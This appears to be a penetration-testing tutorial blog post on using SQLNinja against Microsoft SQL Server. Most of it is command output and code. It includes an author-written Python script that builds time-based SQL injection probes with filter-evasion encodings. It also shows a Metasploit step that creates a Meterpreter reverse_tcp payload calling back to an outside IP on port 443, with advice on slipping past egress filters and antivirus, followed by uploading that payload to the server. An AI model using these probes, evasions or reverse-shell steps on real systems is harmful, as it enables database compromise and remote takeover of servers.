I have recently been learning penetration testing on BackTrack 5, and am working through SQLMap and SQLNinja. Below is how to use SQLNinja; SQLMap usage was covered in an earlier post.
root@perl-exploits:/pentest/database/sqlninja-0.2.3# ./sqlninja -m
Usage: ./sqlninja
-m <mode> : Required. Available modes are:
t/test - test whether the injection is working
f/fingerprint - fingerprint user, xp_cmdshell and more
b/bruteforce - bruteforce sa account
e/escalation - add user to sysadmin server role
x/resurrectxp - try to recreate xp_cmdshell
u/upload - upload a .scr file
s/dirshell - start a direct shell
k/backscan - look for an open outbound port
r/revshell - start a reverse shell
d/dnstunnel - attempt a dns tunneled shell
c/sqlcmd - issue a 'blind' OS command
m/metasploit - wrapper to Metasploit stagers
-f <file> : configuration file (default: sqlninja.conf)
-p <password> : sa password
-w <wordlist> : wordlist to use in bruteforce mode (dictionary method only)
-v : verbose output
-d <mode> : activate debug
1 - print each injected command
2 - print each raw HTTP request
3 - print each raw HTTP response
all - all of the above
…see sqlninja-howto.html for details
That is a lot of options, so let's go through them one by one.
./sqlninja -m <mode> selects the mode to run (sqlninja also calls these modules). The target and the vulnerable HTTP request are not given on the command line; they come from the configuration file (sqlninja.conf by default, or the file passed with -f).
The modes are as follows.
t/test - checks that the current injection point and the configuration file actually work, i.e. that sqlninja can get the server to execute an injected statement.
./sqlninja -m test
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file…………….
[+] Evasion technique(s):
- query hex-encoding
- comments as separator
- random URI encoding
[+] Checking whether the remote server uses SSL
[+] The remote server does not talk SSL
[+] Target is: www.maimai.xxx
[+] Trying to inject a 'waitfor delay'....
[+] Injection was successful! Let's rock !!
OK, the test succeeded: sqlninja was able to make the server pause with an injected 'waitfor delay', so the injection point is usable and an SQL injection vulnerability exists. Note that this test is purely time-based (the only signal is the delay), so on a slow or jittery link it is worth re-running it before trusting the result.
f/fingerprint - fingerprint user, xp_cmdshell and more. This mode determines the SQL Server version, the current database user and its rights, and whether xp_cmdshell exists and is usable. sqlninja only targets Microsoft SQL Server, so this is version fingerprinting rather than detection of the database type.
root@perl-exploits:/pentest/database/sqlninja-0.2.3# ./sqlninja -m fingerprint
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file…………….
[+] Evasion technique(s):
- query hex-encoding
- comments as separator
- random URI encoding
[+] Checking whether the remote server uses SSL
[+] The remote server does not talk SSL
[+] Target is: www.maimai.xxx
What do you want to discover ?
0 – Database version (2000/2005)
1 – Database user
2 – Database user rights
3 – Whether xp_cmdshell is working
4 – Whether mixed or Windows-only authentication is used
a – All of the above
h – Print this menu
q – exit
>
0 - detect the SQL Server version (2000 or 2005)
1 - the current database user
2 - the current database user's rights (in particular whether it is sysadmin)
3 - check whether xp_cmdshell is available and working
4 - whether the server uses mixed-mode (SQL Server and Windows) authentication or Windows-only authentication
a - run all of the checks above
h - show this help menu
q - exit
> a
[+] Checking SQL Server version…
Target: Microsoft SQL Server 2000
[+] Checking whether we are sysadmin…
We seem to be 'sa'
[+] Checking whether xp_cmdshell is available
xp_cmdshell seems to be available
Mixed authentication seems to be used
>
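What the test and fingerprint modes above do under the hood, as an added example that is not sqlninja's own code: each question is turned into a yes/no T-SQL condition wrapped in IF (...) WAITFOR DELAY, so that a "true" answer shows up as a measurable pause, and the three evasions listed in the banner (query hex-encoding, comments as separator, random URI encoding) are applied before the request goes out. The conditions in FINGERPRINT_CHECKS and the exact EXEC wrapper are my own choices for illustration; sqlninja's real queries may differ in detail.

```python
"""Blind, time-based probes of the kind sqlninja's 'test' and 'fingerprint'
modes send, plus the three evasions from its banner (example code, not sqlninja's)."""
import random
from urllib.parse import unquote

# Yes/no conditions behind the fingerprint menu entries (my choices, not sqlninja's exact queries).
FINGERPRINT_CHECKS = {
    "version_is_2000": "@@version LIKE '%SQL Server 2000%'",
    "user_is_sysadmin": "IS_SRVROLEMEMBER('sysadmin')=1",
    "xp_cmdshell_present": "(SELECT COUNT(*) FROM master..sysobjects WHERE name='xp_cmdshell')>0",
    "mixed_auth": "CAST(SERVERPROPERTY('IsIntegratedSecurityOnly') AS INT)=0",
}

# Characters left unencoded by default; everything else is always percent-encoded.
ALWAYS_SAFE = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.~")


def time_based_probe(condition: str, seconds: int = 5) -> str:
    """A true condition stalls the server for `seconds`; a false one returns at once."""
    return f"IF ({condition}) WAITFOR DELAY '0:0:{seconds}'"


def comment_separators(sql: str) -> str:
    """Comments-as-separator evasion: replace spaces outside single-quoted literals with /**/."""
    out, in_str = [], False
    for ch in sql:
        if ch == "'":
            in_str = not in_str
            out.append(ch)
        elif ch == " " and not in_str:
            out.append("/**/")
        else:
            out.append(ch)
    return "".join(out)


def hex_exec_encode(sql: str) -> str:
    """Query hex-encoding evasion: ship the statement as a hex literal and EXEC it.
    SQL Server converts the binary to VARCHAR on assignment, so no keyword is sent in clear."""
    hexed = sql.encode("latin-1").hex()
    return f"DECLARE @q VARCHAR(8000);SET @q=0x{hexed};EXEC(@q)"


def hex_exec_decode(wrapped: str) -> str:
    """Recover the statement from a hex_exec_encode() wrapper (to verify what was sent)."""
    start = wrapped.index("0x") + 2
    end = wrapped.index(";", start)
    return bytes.fromhex(wrapped[start:end]).decode("latin-1")


def random_uri_encode(s: str, rng: random.Random, ratio: float = 0.3) -> str:
    """Random URI encoding: percent-encode every unsafe char and a random `ratio` of safe ones.
    Assumes an ASCII payload; urllib's unquote() restores the original exactly."""
    out = []
    for ch in s:
        if ch in ALWAYS_SAFE and rng.random() >= ratio:
            out.append(ch)
        else:
            out.append(f"%{ord(ch):02X}")
    return "".join(out)


def build_probe(check: str, seed: int = 0, seconds: int = 5) -> str:
    """One fingerprint question, fully wrapped and evaded, ready to drop into the vulnerable parameter."""
    sql = time_based_probe(FINGERPRINT_CHECKS[check], seconds)
    evaded = comment_separators(hex_exec_encode(sql))
    return random_uri_encode(evaded, random.Random(seed))


def decode_probe(uri_payload: str) -> str:
    """Undo the three evasions: what the SQL Server parser ultimately executes."""
    wrapper = unquote(uri_payload).replace("/**/", " ")
    return hex_exec_decode(wrapper)


if __name__ == "__main__":
    for name in FINGERPRINT_CHECKS:
        print(name, "->", build_probe(name, seed=1))
```

Because every answer arrives only as a delay, a probe should be sent more than once and compared against a baseline request before a "true" is accepted; that is also why the debug flag -d 1 (print each injected command) is worth enabling when a fingerprint result looks implausible.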
m/metasploit uses payloads from Metasploit. This mode is not enabled by default; you need to edit the Metasploit settings in sqlninja.conf:
# Path to metasploit executable. Only needed if msfpayload and
# msfcli are not already in the path
msfpath = /pentest/exploits/framework3/   # uncomment this line and set it to your framework3 install directory
root@perl-exploits:/pentest/database/sqlninja-0.2.3# ./sqlninja -m metasploit
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file…………….
[+] Evasion technique(s):
- query hex-encoding
- comments as separator
- random URI encoding
[+] Checking whether the remote server uses SSL
[+] The remote server does not talk SSL
[+] Target is: www.maimai.xxx
[+] Entering Metasploit module. In order to use this module you need to
have found an available TCP port, either inbound or outbound
[+] Checking Metasploit3 availability….
[+] Which payload you want to use?
1: Meterpreter
2: VNC
>
This runs Metasploit, since sqlninja calls Metasploit's payloads. There are two options: Meterpreter, or a VNC reverse connection. If you are working from a console, Meterpreter is recommended; under GNOME or another desktop environment, VNC. (One note here: you must have vncserver installed on your own machine; in my testing, the vncserver inside Metasploit could not be invoked correctly.)
OK, let's test both methods. First, Meterpreter.
> 1
[+] Which type of connection you want to use?
1: bind_tcp
2: reverse_tcp
>
Here we choose the connection type. 1 is bind_tcp, which opens a listening port on the server for us to connect to; 2 is reverse_tcp, which makes the server connect back to our machine. Since the server is likely behind a firewall that blocks inbound connections, 2 is generally recommended; but if you have no public IP or a VPN that the target can reach, use bind_tcp.
Here we choose 2.
> 2
[+] Enter local port number
> 443
Here we enter the local port the handler will listen on; pick one that is not already in use. I enter 443: binding it needs root (which we have), and a well-known port such as 443 is more likely to be let out through the target's egress filtering than an arbitrary high port.
[+] Choose a payload encoding method
0 – none
1 – Alpha2 Alphanumeric Mixedcase
2 – Alpha2 Alphanumeric Uppercase
3 – Avoid UTF8/tolower
4 – Call+4 Dword XOR
5 – Single-byte XOR Countdown
6 – Variable-length Fnstenv/mov Dword XOR
7 – Polymorphic Jump/Call XOR Additive Feedback
8 – Non-Alpha
9 – Non-Upper
10 – Polymorphic XOR Additive Feedback
11 – Alpha2 Alphanumeric Unicode Mixedcase
12 – Alpha2 Alphanumeric Unicode Uppercase
>
Here you choose the encoder for the shellcode. This is encoding, not encryption: Metasploit encoders transform the payload to avoid bad characters and to slip past simple signature-based antivirus on the server. Choose according to your situation; I choose 0 (none).
[+] Calling msfpayload3 to create the payload…
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: exitfunc=process,lport=443,lhost=211.45.123.200
[+] Payload (met50838.exe) created. Now converting it to debug script
[+] Uploading /tmp/met50838.scr debug script…………